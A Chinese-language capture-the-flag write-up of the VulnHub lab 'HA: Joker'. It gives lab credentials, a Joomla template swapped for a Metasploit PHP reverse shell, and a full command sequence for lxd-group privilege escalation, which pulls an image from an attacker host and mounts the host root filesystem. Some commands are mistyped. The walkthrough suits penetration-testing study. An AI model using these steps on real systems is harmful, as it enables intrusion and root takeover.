vulnhub靶场之HA: Joker

难度:低级

该实验室将引入一些无政府状态。它将破坏既定的秩序,一切变成混乱。涂上你的脸,穿那套紫色的西装,因为是时候传达你内在的小丑了。这是一个boot2root实验。获得根标志是最终目标。
枚举是关键!!!!
vulnhub靶场之HA: Joker_第1张图片
查看页面源代码,发现大量注释。
vulnhub靶场之HA: Joker_第2张图片
没看过小丑的电影,不知道这些台词啥意思。
访问8080端口,发现需要http认证。我怀疑账号密码需要在这些注释里找线索,
在这里浪费的大量时间。
做不出来 直接看了writeup:
https://www.cnblogs.com/hack404/p/11726118.html
这里http认证的账号密码是
joker hannah
不看答案真破解不出来,我的字典里没有hannah.
vulnhub靶场之HA: Joker_第3张图片
后台是一个joomla管理系统,在这里爆破了用户名和密码
账号joomla joomla
vulnhub靶场之HA: Joker_第4张图片
修改模板index.php为msf的 phpshell。
vulnhub靶场之HA: Joker_第5张图片
成功反弹上线。
vulnhub靶场之HA: Joker_第6张图片
id查看
发现是lxd组的成员。
利用lxd提权
vulnhub靶场之HA: Joker_第7张图片
开启centos。
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
Python2 -c SimpleHTTPServer
vulnhub靶场之HA: Joker_第8张图片vulnhub靶场之HA: Joker_第9张图片
vulnhub靶场之HA: Joker_第10张图片
wget http://192.168.0.106:8000/alpine-v3.11-x86_64-20200215_1651.tar.gz
lxc image import ./alpine-v3.11-x86_64-20200215_1651.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
vulnhub靶场之HA: Joker_第11张图片
Cd /mnt/root/root
Cat final.txt
拿到flag

关于lxd提权可以看这两篇文章
https://www.freebuf.com/articles/system/216803.html
https://www.anquanke.com/post/id/179407

你可能感兴趣的:(vulnhub靶场之HA: Joker)